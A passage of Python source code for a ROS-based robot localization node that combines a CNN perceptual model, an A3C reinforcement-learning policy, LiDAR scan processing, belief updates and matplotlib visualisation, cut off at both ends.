= x-x.min() x = x/x.max() return x Pose2d = recordtype("Pose2d", "theta x y") Grid = recordtype("Grid", "head row col") class Lidar(): def __init__(self, ranges, angle_min, angle_max, range_min, range_max, noise=0): # self.ranges = np.clip(ranges, range_min, range_max) self.ranges = np.array(ranges) self.angle_min = angle_min self.angle_max = angle_max num_data = len(self.ranges) self.angle_increment = (self.angle_max-self.angle_min)/num_data #math.increment self.angles_2pi= np.linspace(angle_min, angle_max, len(ranges), endpoint=True) % (2*np.pi) idx = np.argsort(self.angles_2pi) self.ranges_2pi = self.ranges[idx] self.angles_2pi = self.angles_2pi[idx] class LocalizationNode(object): def __init__(self, args): self.skip_to_end = False # self.wait_for_scan = False self.scan_once = False self.scan_bottom_once = False self.scan_on = False self.scan_ready = False self.scan_bottom_ready = False self.wait_for_move = False self.robot_pose_ready = False self.args = args self.rl_test = False self.start_time = time.time() if (self.args.use_gpu) > 0 and torch.cuda.is_available(): self.device = torch.device("cuda" ) torch.set_default_tensor_type(torch.cuda.FloatTensor) else: self.device = torch.device("cpu") torch.set_default_tensor_type(torch.FloatTensor) # self.args.n_maze_grids # self.args.n_local_grids # self.args.n_lm_grids self.init_fig = False self.n_maze_grids = None self.grid_rows = self.args.n_local_grids #self.args.map_size * self.args.sub_resolution self.grid_cols = self.args.n_local_grids #self.args.map_size * self.args.sub_resolution self.grid_dirs = self.args.n_headings num_dirs = 1 num_classes = self.args.n_lm_grids ** 2 * num_dirs final_num_classes = num_classes if self.args.n_pre_classes is not None: num_classes = self.args.n_pre_classes else: num_classes = final_num_classes if self.args.pm_net == "none": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = None elif self.args.pm_net == "densenet121": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet121(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 1024 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "densenet169": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet169(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 1664 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "densenet201": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet201(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 1920 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "densenet161": #/home/sr2/keehong.seo/my_python/lib/python2.7/site-packages/torchvision/models/densenet.py self.map_rows = 224 self.map_cols = 224 self.perceptual_model = densenet161(pretrained = self.args.use_pretrained, drop_rate = self.args.drop_rate) num_ftrs = self.perceptual_model.classifier.in_features # 2208 self.perceptual_model.classifier = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet18s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet18s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet34s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet34s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet50s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet50s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet101s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet101s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet152s": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet152s(pretrained=self.args.use_pretrained) num_ftrs = self.perceptual_model.fc.in_features self.perceptual_model.fc = nn.Linear(num_ftrs, num_classes) elif self.args.pm_net == "resnet18": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet18(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet34": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet34(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet50": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet50(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet101": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet101(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features elif self.args.pm_net == "resnet152": self.map_rows = 224 self.map_cols = 224 self.perceptual_model = resnet152(num_classes = num_classes) num_ftrs = self.perceptual_model.fc.in_features # 2048 else: raise Exception('pm-net required: resnet or densenet') if self.args.RL_type == 0: self.policy_model = policy_A3C(self.args.n_state_grids, 2+self.args.n_state_dirs, num_actions = self.args.num_actions) elif self.args.RL_type == 1: self.policy_model = policy_A3C(self.args.n_state_grids, 1+self.args.n_state_dirs, num_actions = self.args.num_actions) elif self.args.RL_type == 2: self.policy_model = policy_A3C(self.args.n_state_grids, 2*self.args.n_state_dirs, num_actions = self.args.num_actions, add_raw_map_scan = True) self.intri_model = intrinsic_model(self.grid_rows) ## D.P. was here ## # load models if self.args.pm_model is not None: state_dict = torch.load(self.args.pm_model) new_state_dict = OrderedDict() for k,v in state_dict.items(): if 'module.' in k: name = k[7:] else: name = k new_state_dict[name] = v self.perceptual_model.load_state_dict(new_state_dict) print ('perceptual model %s is loaded.'%self.args.pm_model) if self.args.rl_model == "none": self.args.rl_model = None if self.args.rl_model is not None: state_dict = torch.load(self.args.rl_model) new_state_dict = OrderedDict() for k,v in state_dict.items(): if 'module.' in k: name = k[7:] else: name = k new_state_dict[name] = v self.policy_model.load_state_dict(new_state_dict) print ('policy model %s is loaded.'%self.args.rl_model) if self.args.ir_model is not None: self.intri_model.load_state_dict(torch.load(self.args.ir_model)) print ('intri model %s is loaded.'%self.args.ir_model) # change n-classes if self.args.n_pre_classes is not None: # resize the output layer: new_num_classes = final_num_classes if "resnet" in self.args.pm_net: self.perceptual_model.fc = nn.Linear(self.perceptual_model.fc.in_features, new_num_classes, bias=True) elif "densenet" in args.pm_net: num_ftrs = self.perceptual_model.classifier.in_features self.perceptual_model.classifier = nn.Linear(num_ftrs, new_num_classes) print ('model: num_classes now changed to', new_num_classes) # data parallel, multi GPU # https://pytorch.org/tutorials/beginner/blitz/data_parallel_tutorial.html if self.device==torch.device("cuda") and torch.cuda.device_count()>0: print ("Use", torch.cuda.device_count(), 'GPUs') if self.perceptual_model != None: self.perceptual_model = nn.DataParallel(self.perceptual_model) self.policy_model = nn.DataParallel(self.policy_model) self.intri_model = nn.DataParallel(self.intri_model) else: print ("Use CPU") if self.perceptual_model != None: self.perceptual_model.to(self.device) self.policy_model.to(self.device) self.intri_model.to(self.device) # if self.perceptual_model != None: if self.args.update_pm_by == "NONE": self.perceptual_model.eval() else: self.perceptual_model.train() if self.args.update_rl: self.policy_model.train() else: self.policy_model.eval() self.min_scan_range, self.max_scan_range = self.args.scan_range #[0.1, 3.5] self.prob=np.zeros((1,3)) self.values = [] self.log_probs = [] self.manhattans = [] self.xyerrs = [] self.manhattan = 0 self.rewards = [] self.intri_rewards = [] self.reward = 0 self.entropies = [] self.gamma = 0.99 self.tau = 0.95 #Are we sure? self.entropy_coef = self.args.c_entropy if self.args.update_pm_by == "NONE": self.optimizer_pm = None else: self.optimizer_pm = torch.optim.Adam(list(self.perceptual_model.parameters()), lr=self.args.lrpm) if self.args.schedule_pm: self.scheduler_pm = StepLR(self.optimizer_pm, step_size=self.args.pm_step_size, gamma=self.args.pm_decay) # self.scheduler_lp = ReduceLROnPlateau(self.optimizer_pm, # factor = 0.5, # patience = 2, # verbose = True) models = [] if self.args.update_pm_by=="RL" or self.args.update_pm_by=="BOTH": models = models + list(self.perceptual_model.parameters()) if self.args.update_rl: models = models + list(self.policy_model.parameters()) if self.args.update_ir: models = models + list(self.intri_model.parameters()) if models==[]: self.optimizer = None print("WARNING: no model for RL") else: self.optimizer = torch.optim.Adam(models, lr=self.args.lrrl) if self.args.schedule_rl: self.scheduler_rl = StepLR(self.optimizer, step_size=self.args.rl_step_size, gamma=self.args.rl_decay) self.pm_backprop_cnt = 0 self.rl_backprop_cnt = 0 self.step_count = 0 self.step_max = self.args.num[2] self.episode_count = 0 self.acc_epi_cnt = 0 self.episode_max = self.args.num[1] self.env_count = 0 self.env_max = self.args.num[0] self.env_count = 0 self.next_bin = 0 self.done = False if self.args.verbose>0: print('maps, episodes, steps = %d, %d, %d'%(self.args.num[0], self.args.num[1], self.args.num[2])) self.cx = torch.zeros(1,256) #Variable(torch.zeros(1, 256)) self.hx = torch.zeros(1,256) #Variable(torch.zeros(1, 256)) self.max_grad_norm = 40 map_side_len = 224 * self.args.map_pixel self.xlim = (-0.5*map_side_len, 0.5*map_side_len) self.ylim = (-0.5*map_side_len, 0.5*map_side_len) self.xlim = np.array(self.xlim) self.ylim = np.array(self.ylim) self.map_width_meter = map_side_len # decide maze grids for each env # if self.args.maze_grids_range[0] == None: # pass # else: # self.n_maze_grids = np.random.randint(self.args.maze_grids_range[0],self.args.maze_grids_range[1]) # self.hall_width = self.map_width_meter/self.n_maze_grids # if self.args.thickness == None: # self.obs_radius = 0.25*self.hall_width # else: # self.obs_radius = 0.5*self.args.thickness * self.hall_width self.collision_radius = self.args.collision_radius #0.25 # robot radius for collision self.longest = float(self.grid_dirs/2 + self.grid_rows-1 + self.grid_cols-1) #longest possible manhattan distance self.cell_size = (self.xlim[1]-self.xlim[0])/self.grid_rows self.heading_resol = 2*np.pi/self.grid_dirs self.fwd_step_meters = self.cell_size*self.args.fwd_step self.collision = False self.sigma_xy = self.args.sigma_xy # self.cell_size * 0.05 self.cr_pixels = int(np.ceil(self.collision_radius / self.args.map_pixel)) self.front_margin_pixels = int(np.ceil((self.collision_radius+self.fwd_step_meters) / self.args.map_pixel)) # how many pixels robot moves forward per step. self.side_margin_pixels = int(np.ceil(self.collision_radius / self.args.map_pixel)) self.scans_over_map = np.zeros((self.grid_rows,self.grid_cols,360)) self.scan_2d_low_tensor = torch.zeros((1,self.args.n_state_grids, self.args.n_state_grids),device=torch.device(self.device)) self.map_for_LM = np.zeros((self.map_rows, self.map_cols)) self.map_for_pose = np.zeros((self.grid_rows, self.grid_cols),dtype='float') self.map_for_RL = torch.zeros((1,self.args.n_state_grids, self.args.n_state_grids),device=torch.device(self.device)) self.data_cnt = 0 self.explored_space = np.zeros((self.grid_dirs,self.grid_rows, self.grid_cols),dtype='float') self.new_pose = False self.new_bel = False self.bel_list = [] self.scan_list = [] self.target_list = [] self.likelihood = torch.ones((self.grid_dirs,self.grid_rows, self.grid_cols), device=torch.device(self.device), dtype=torch.float) self.likelihood = self.likelihood / self.likelihood.sum() self.gt_likelihood = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) self.gt_likelihood_unnormalized = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) self.belief = torch.ones((self.grid_dirs,self.grid_rows, self.grid_cols),device=torch.device(self.device)) self.belief = self.belief / self.belief.sum() self.prior = self.belief.detach().cpu().numpy() self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() # self.bel_ent = np.log(1.0/(self.grid_dirs*self.grid_rows*self.grid_cols)) self.loss_likelihood = [] # loss for training PM model self.loss_ll=0 self.loss_policy = 0 self.loss_value = 0 self.turtle_loc = np.zeros((self.map_rows,self.map_cols)) self.policy_out = None self.value_out = None self.action_idx = -1 self.action_from_policy = -1 # what to do # current pose: where the robot really is. motion incurs errors in pose self.current_pose = Pose2d(0,0,0) self.live_pose = Pose2d(0,0,0) # updated on-line from cbRobotPose self.odom_pose = Pose2d(0,0,0) # updated from jay1/odom self.map_pose = Pose2d(0,0,0) # updated from jay1/odom and transformed to map coordinates self.goal_pose = Pose2d(0,0,0) self.last_pose = Pose2d(0,0,0) self.perturbed_goal_pose = Pose2d(0,0,0) self.start_pose = Pose2d(0,0,0) self.collision_pose = Pose2d(0,0,0) self.believed_pose = Pose2d(0,0,0) #grid pose self.true_grid = Grid(head=0,row=0,col=0) self.bel_grid = Grid(head=0,row=0,col=0) self.collision_grid = Grid(head=0,row=0,col=0) self.action_space = list(("turn_left", "turn_right", "go_fwd", "hold")) self.action_str = 'none' self.current_state = "new_env_pose" self.obj_act = None self.obj_rew = None self.obj_err = None self.obj_map = None self.obj_robot = None self.obj_heading = None self.obj_robot_bel = None self.obj_heading_bel = None self.obj_pose = None self.obj_scan = None self.obj_gtl = None self.obj_lik = None self.obj_bel = None self.obj_bel_prior = None self.obj_bel_dist = None self.obj_gtl_dist = None self.obj_lik_dist = None self.obj_collision = None if self.args.save: home=os.environ['HOME'] str_date_time = datetime.now().strftime('%Y%m%d-%H%M%S') # 1. try create /logs/YYMMDD-HHMMSS-00 # 2. if exist create /logs/YYMMDD-HHMMSS-01, and so on i = 0 dir_made=False while dir_made==False: # self.log_dir = os.path.join(home, anl_loc, 'logs/', str_date_time+'-%02d'%i) # self.log_dir = os.path.join(home, self.args.save_loc, str_date_time+'-%02d'%i) self.log_dir = os.path.join(self.args.save_loc, str_date_time+'-%02d'%i) try: os.mkdir(self.log_dir) dir_made=True except OSError as exc: if exc.errno != errno.EEXIST: raise pass i=i+1 if self.args.verbose > 0: print ('new directory %s'%self.log_dir) self.param_filepath = os.path.join(self.log_dir, 'param.txt') with open(self.param_filepath,'w+') as param_file: for arg in vars(self.args): param_file.write('<%s=%s> '%(arg, getattr(self.args, arg))) if self.args.verbose > -1: print ('parameters saved at %s'%self.param_filepath) self.log_filepath = os.path.join(self.log_dir, 'log.txt') self.rollout_list = os.path.join(self.log_dir, 'rollout_list.txt') self.pm_filepath = os.path.join(self.log_dir, 'perceptual.model') self.rl_filepath = os.path.join(self.log_dir, 'rl.model') self.ir_filepath = os.path.join(self.log_dir, 'ir.model') self.data_path = os.path.join(self.log_dir, 'data') self.fig_path = os.path.join(self.log_dir, 'figures') # if self.args.save_data: try: os.mkdir(self.data_path) except OSError as exc: if exc.errno != errno.EEXIST: raise pass if self.args.figure: try: os.mkdir(self.fig_path) except OSError as exc: if exc.errno != errno.EEXIST: raise pass self.twist_msg_move = Twist() self.twist_msg_move.linear.x = 0 self.twist_msg_move.linear.y = 0 self.twist_msg_move.angular.z = 0 self.twist_msg_stop = Twist() self.twist_msg_stop.linear.x = 0 self.twist_msg_stop.linear.y = 0 self.twist_msg_stop.angular.z = 0 #Subscribers #self.sub_map = rospy.Subscriber('map', OccupancyGrid, self.cbMap, queue_size = 1) # self.sub_odom = rospy.Subscriber('odom', Odometry, self.cbOdom, queue_size # = 1) self.dal_pose = PoseStamped() self.pose_seq_cnt = 0 if self.args.gazebo: self.sub_laser_scan = rospy.Subscriber('scan', LaserScan, self.cbScan, queue_size = 1) self.pub_cmdvel = rospy.Publisher('cmd_vel', Twist, queue_size = 1) self.pub_dalpose = rospy.Publisher('dal_pose', PoseStamped, queue_size = 1) # self.sub_odom = rospy.Subscriber('odom', Odometry, self.cbOdom, queue_size = 1) elif self.args.jay1: self.pub_cmdvel = rospy.Publisher('jay1/cmd_vel', Twist, queue_size = 1) self.pub_dalpose = rospy.Publisher('dal_pose', PoseStamped, queue_size = 1) self.sub_laser_scan = rospy.Subscriber('jay1/scan', LaserScan, self.cbScanTop, queue_size = 1) self.sub_laser_scan = rospy.Subscriber('jay1/scan1', LaserScan, self.cbScanBottom, queue_size = 1) self.sub_robot_pose = rospy.Subscriber('jay1/robot_pose', PoseStamped, self.cbRobotPose, queue_size = 1) self.sub_odom = rospy.Subscriber('jay1/odom', Odometry, self.cbOdom, queue_size = 1) self.client = actionlib.SimpleActionClient('jay1/move_base', MoveBaseAction) self.client.wait_for_server() rospy.loginfo("Waiting for move_base action server...") wait = self.client.wait_for_server(rospy.Duration(5.0)) if not wait: rospy.logerr("Action server not available!") rospy.signal_shutdown("Action server not available!") exit() rospy.loginfo("Connected to move base server") rospy.loginfo("Starting goals achievements ...") if self.args.gazebo or self.args.jay1: rospy.Timer(rospy.Duration(self.args.timer), self.loop_jay) self.max_turn_rate = 1.0 self.turn_gain = 10 self.fwd_err_margin = 0.005 self.ang_err_margin = math.radians(0.2) self.fsm_state = "init" #end of init def loop(self): if self.current_state == "new_env_pose": ### place objects in the env self.clear_objects() if self.args.load_map == None: self.set_maze_grid() self.set_walls() elif self.args.load_map == 'randombox': self.random_box() else: self.read_map() self.map_for_LM = fill_outer_rim(self.map_for_LM, self.map_rows, self.map_cols) if self.args.distort_map: self.map_for_LM = distort_map(self.map_for_LM, self.map_rows, self.map_cols) self.make_low_dim_maps() if self.args.gtl_off == False: self.get_synth_scan_mp(self.scans_over_map, map_img=self.map_for_LM, xlim=self.xlim, ylim=self.ylim) # generate synthetic scan data over the map (and directions) self.reset_explored() placed = self.place_turtle() if placed: self.current_state = "update_likelihood" else: print ("place turtle failed. retrying a new map") return if self.args.figure==True: self.update_figure(newmap=True) elif self.current_state == "new_pose": self.reset_explored() self.place_turtle() self.current_state = "update_likelihood" elif self.current_state == "update_likelihood": self.get_lidar() self.update_explored() if self.step_count == 0: self.save_roll_out = self.args.save & np.random.choice([False, True], p=[1.0-self.args.prob_roll_out, self.args.prob_roll_out]) if self.save_roll_out: #save roll-out for next episode. self.roll_out_filepath = os.path.join(self.log_dir, 'roll-out-%03d-%03d.txt'%(self.env_count,self.episode_count)) print ('roll-out saving: %s'%self.roll_out_filepath) self.scan_2d, self.scan_2d_low = self.get_scan_2d_n_headings(self.scan_data, self.xlim, self.ylim) self.slide_scan() ### 2. update likelihood from observation self.compute_gtl(self.scans_over_map) if self.args.generate_data: # end the episode ... (no need for measurement/motion model) self.generate_data() if self.args.figure: self.update_figure() plt.pause(1e-4) self.next_step() return self.likelihood = self.update_likelihood_rotate(self.map_for_LM, self.scan_2d) if self.args.mask: self.mask_likelihood() #self.likelihood.register_hook(print) ### z(t) = like x belief ### z(t) = like x belief # if self.collision == False: self.product_belief() ### reward r(t) self.update_bel_list() self.get_reward() ### action a(t) given s(t) = (z(t)|Map) if self.args.verbose>0: self.report_status(end_episode=False) if self.save_roll_out: self.collect_data() if self.args.figure: self.update_figure() self.run_action_module() if self.skip_to_end: self.skip_to_end = False self.next_ep() return ### environment: set target self.update_target_pose() # do the rest: ation, trans-belief, update gt self.collision_check() self.execute_action_teleport() ### environment: change belief z_hat(t+1) self.transit_belief() ### increase time step # self.update_current_pose() if self.collision == False: self.update_true_grid() ## Prior ## # if self.args.figure: # ax=self.ax_prior # self.update_prior_plot(ax) # ax=self.ax_map # self.draw_robot(ax) # self.draw_bel(ax) # self.draw_collision(ax, self.collision) # ax=self.ax_pose # self.update_pose_plot(ax) # plt.pause(1e-3) self.next_step() return else: print("undefined state name %s"%self.current_state) self.current_state = None exit() return def get_statistics(self, dis, name): DIRS = 'NWSE' this=[] for i in range(self.grid_dirs): # this.append('%s(%s%1.3f,%s%1.3f,%s%1.3f%s)'\ # %(DIRS[i], bcolors.WARNING,100*dis[i,:,:].max(), # bcolors.OKGREEN,100*dis[i,:,:].median(), # bcolors.FAIL,100*dis[i,:,:].min(),bcolors.ENDC)) this.append(' %s(%1.2f,%1.2f,%1.2f)'\ %(DIRS[i], 100*dis[i,:,:].max(), 100*dis[i,:,:].median(), 100*dis[i,:,:].min())) return name+':%19s|%23s|%23s|%23s|'%tuple(this[th] for th in range(self.grid_dirs)) def circular_placement(self, x, n): width = x.shape[2] height = x.shape[1] N = (n/2+1)*max(width,height) img = np.zeros((N,N)) for i in range(n): if i < n/4: origin = (i, (n/4-i)) elif i < 2*n/4: origin = (i, (i-n/4)) elif i < 3*n/4: origin = (n-i, (i-n/4)) else: origin = (n-i, n+n/4-i) ox = origin[0]*height oy = origin[1]*width img[ox:ox+height, oy:oy+width] = x[i,:,:] return img def square_clock(self, x, n): width = x.shape[2] height = x.shape[1] quater = n/4-1 #even/odd even = 1 - quater % 2 side = quater+2+even N = side*max(width,height) img = np.zeros((N,N)) for i in range(n): s = (i+n/8)%n if s < n/4: org = (0, n/4-s) elif s < n/2: org = (s-n/4+even, 0) elif s < 3*n/4: org = (n/4+even, s-n/2+even) else: org = (n/4-(s-3*n/4), n/4+even) ox = org[0]*height oy = org[1]*width img[ox:ox+height, oy:oy+width] = x[i,:,:] del x return img, side def draw_compass(self, ax): cx = 0.9 * self.xlim[1] cy = 0.9 * self.ylim[0] lengthNS = self.xlim[1] * 0.1 lengthEW = self.ylim[1] * 0.075 theta = - self.current_pose.theta Nx = cx + lengthNS * np.cos(theta) Ny = cy + lengthNS* np.sin(theta) Sx = cx + lengthNS * np.cos(theta+np.pi) Sy = cy + lengthNS * np.sin(theta+np.pi) Ni = to_index(Nx, self.map_rows, self.xlim) Nj = to_index(Ny, self.map_cols, self.ylim) Si = to_index(Sx, self.map_rows, self.xlim) Sj = to_index(Sy, self.map_cols, self.ylim) Ex = cx + lengthEW * np.cos(theta-np.pi/2) Ey = cy + lengthEW * np.sin(theta-np.pi/2) Wx = cx + lengthEW * np.cos(theta+np.pi/2) Wy = cy + lengthEW * np.sin(theta+np.pi/2) Ei = to_index(Ex, self.map_rows, self.xlim) Ej = to_index(Ey, self.map_cols, self.ylim) Wi = to_index(Wx, self.map_rows, self.xlim) Wj = to_index(Wy, self.map_cols, self.ylim) xdata = Sj, Nj, Wj, Ej ydata = Si, Ni, Wi, Ei if hasattr(self, 'obj_compass1'): self.obj_compass1.update({'xdata':xdata, 'ydata':ydata}) else: self.obj_compass1, = ax.plot(xdata, ydata, 'r', alpha = 0.5) def draw_center(self, ax): x = to_index(0, self.map_rows, self.xlim) y = to_index(0, self.map_cols, self.ylim) # radius = self.map_rows*0.4/self.grid_rows radius = self.cr_pixels # self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows theta = 0-np.pi/2 xdata = y, y+radius*3*np.cos(theta) ydata = x, x+radius*3*np.sin(theta) obj_robot = Wedge((y,x), radius, 0, 360, color='r',alpha=0.5) obj_heading, = ax.plot(xdata, ydata, 'r', alpha=0.5) ax.add_artist(obj_robot) def draw_collision(self, ax, collision): if collision == False: if self.obj_collision == None: return else: self.obj_collision.update({'visible':False}) else: x = to_index(self.collision_pose.x, self.map_rows, self.xlim) y = to_index(self.collision_pose.y, self.map_cols, self.ylim) radius = self.cr_pixels #self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows if self.obj_collision == None: self.obj_collision = Wedge((y,x), radius, 0, 360, color='y',alpha=0.5, visible=True) ax.add_artist(self.obj_collision) else: self.obj_collision.update({'center': [y,x], 'visible':True}) # self.obj_robot.set_data(self.turtle_loc) # plt.pause(0.01) def draw_robot(self, ax): x = to_index(self.current_pose.x, self.map_rows, self.xlim) y = to_index(self.current_pose.y, self.map_cols, self.ylim) # radius = self.map_rows*0.4/self.grid_rows radius = self.cr_pixels # self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows theta = -self.current_pose.theta-np.pi/2 xdata = y, y+radius*3*np.cos(theta) ydata = x, x+radius*3*np.sin(theta) if self.obj_robot == None: #self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.binary) # self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.Reds,interpolation='nearest') self.obj_robot = Wedge((y,x), radius, 0, 360, color='r',alpha=0.5) self.obj_heading, = ax.plot(xdata, ydata, 'r', alpha=0.5) ax.add_artist(self.obj_robot) else: self.obj_robot.update({'center': [y,x]}) self.obj_heading.update({'xdata':xdata, 'ydata':ydata}) # self.obj_robot.set_data(self.turtle_loc) # plt.pause(0.01) def update_believed_pose(self): o_bel,i_bel,j_bel = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) x_bel = to_real(i_bel, self.xlim,self.grid_rows) y_bel = to_real(j_bel, self.ylim,self.grid_cols) theta = o_bel * self.heading_resol self.believed_pose.x = x_bel self.believed_pose.y = y_bel self.believed_pose.theta = theta self.publish_dal_pose(x_bel, y_bel, theta) def publish_dal_pose(self,x,y,theta): self.dal_pose.pose.position.x = -y self.dal_pose.pose.position.y = x self.dal_pose.pose.position.z = 0 quatern = quaternion_from_euler(0,0, theta+np.pi/2) self.dal_pose.pose.orientation.x=quatern[0] self.dal_pose.pose.orientation.y=quatern[1] self.dal_pose.pose.orientation.z=quatern[2] self.dal_pose.pose.orientation.w=quatern[3] self.dal_pose.header.frame_id = 'map' self.dal_pose.header.seq = self.pose_seq_cnt self.pose_seq_cnt += 1 self.pub_dalpose.publish(self.dal_pose) def update_map_T_odom(self): map_pose = (self.believed_pose.x, self.believed_pose.y, self.believed_pose.theta) odom_pose = (self.odom_pose.x, self.odom_pose.y, self.odom_pose.theta) self.map_T_odom = define_tf(map_pose, odom_pose) def draw_bel(self, ax): o_bel,i_bel,j_bel = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) x_bel = to_real(i_bel, self.xlim,self.grid_rows) y_bel = to_real(j_bel, self.ylim,self.grid_cols) x = to_index(x_bel, self.map_rows, self.xlim) y = to_index(y_bel, self.map_cols, self.ylim) # radius = self.map_rows*0.4/self.grid_rows radius = self.cr_pixels # self.collision_radius / (self.xlim[1]-self.xlim[0]) * self.map_rows theta = o_bel * self.heading_resol theta = -theta-np.pi/2 xdata = y, y+radius*3*np.cos(theta) ydata = x, x+radius*3*np.sin(theta) if self.obj_robot_bel == None: #self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.binary) # self.obj_robot = ax.imshow(self.turtle_loc, alpha=0.5, cmap=plt.cm.Reds,interpolation='nearest') self.obj_robot_bel = Wedge((y,x), radius*0.95, 0, 360, color='b',alpha=0.5) self.obj_heading_bel, = ax.plot(xdata, ydata, 'b', alpha=0.5) ax.add_artist(self.obj_robot_bel) else: self.obj_robot_bel.update({'center': [y,x]}) self.obj_heading_bel.update({'xdata':xdata, 'ydata':ydata}) def init_figure(self): self.init_fig = True if self.args.figure == True:# and self.obj_fig==None: self.obj_fig = plt.figure(figsize=(16,12)) plt.set_cmap('viridis') self.gridspec = gridspec.GridSpec(3,5) self.ax_map = plt.subplot(self.gridspec[0,0]) self.ax_scan = plt.subplot(self.gridspec[1,0]) self.ax_pose = plt.subplot(self.gridspec[2,0]) self.ax_bel = plt.subplot(self.gridspec[0,1]) self.ax_lik = plt.subplot(self.gridspec[1,1]) self.ax_gtl = plt.subplot(self.gridspec[2,1]) # self.ax_prior = plt.subplot(self.gridspec[2,1]) self.ax_pbel = plt.subplot(self.gridspec[0,2:4]) self.ax_plik = plt.subplot(self.gridspec[1,2:4]) self.ax_pgtl = plt.subplot(self.gridspec[2,2:4]) self.ax_act = plt.subplot(self.gridspec[0,4]) self.ax_rew = plt.subplot(self.gridspec[1,4]) self.ax_err = plt.subplot(self.gridspec[2,4]) plt.subplots_adjust(hspace = 0.4, wspace=0.4, top=0.95, bottom=0.05) def update_figure(self, newmap=False): if self.init_fig==False: self.init_figure() if newmap: ax=self.ax_map if self.obj_map == None: # self.ax_map = ax self.obj_map = ax.imshow(self.map_for_LM, cmap=plt.cm.binary,interpolation='nearest') ax.grid() ticks = np.linspace(0,self.map_rows,self.grid_rows,endpoint=False) ax.set_yticks(ticks) ax.set_xticks(ticks) ax.tick_params(axis='y', labelleft='off') ax.tick_params(axis='x', labelbottom='off') ax.tick_params(bottom="off", left="off") else: self.obj_map.set_data(self.map_for_LM) self.draw_robot(ax) return ax=self.ax_map self.draw_robot(ax) self.draw_bel(ax) self.draw_collision(ax, self.collision) ax=self.ax_scan if self.obj_scan == None: self.obj_scan = ax.imshow(self.scan_2d[0,:,:], cmap = plt.cm.binary,interpolation='gaussian') self.obj_scan_slide = ax.imshow(self.scan_2d_slide[:,:], cmap = plt.cm.Blues,interpolation='gaussian', alpha=0.5) # self.obj_scan_low = ax.imshow(cv2.resize(1.0*self.scan_2d_low[:,:], (self.map_rows, self.map_cols), interpolation=cv2.INTER_NEAREST), cmap = plt.cm.binary,interpolation='nearest', alpha=0.5) self.draw_center(ax) self.draw_compass(ax) ax.set_title('LiDAR Scan') else: self.obj_scan.set_data(self.scan_2d[0,:,:]) # self.obj_scan_low.set_data(cv2.resize(1.0*self.scan_2d_low[:,:], (self.map_rows, self.map_cols), interpolation=cv2.INTER_NEAREST)) self.obj_scan_slide.set_data(self.scan_2d_slide[:,:]) self.draw_compass(ax) ax=self.ax_pose self.update_pose_plot(ax) ## GTL ## if self.args.gtl_off: pass else: ax=self.ax_gtl self.update_gtl_plot(ax) ## BELIEF ## ax=self.ax_bel self.update_belief_plot(ax) ## LIKELIHOOD ## ax=self.ax_lik self.update_likely_plot(ax) ax=self.ax_pbel self.update_bel_dist(ax) ax=self.ax_pgtl self.update_gtl_dist(ax) ax=self.ax_plik self.update_lik_dist(ax) # show last step, and save if self.step_count >= self.step_max-1: self.ax_map.set_title('action(%d):%s'%(self.step_count,"")) # self.prob = np.array([0,0,0]) # self.action_from_policy=-1 self.clear_act_dist(self.ax_act) act_lttr=['L','R','F','-'] self.obj_rew= self.update_list(self.ax_rew,self.rewards,self.obj_rew,"Reward", text=act_lttr[self.action_idx]) self.obj_err = 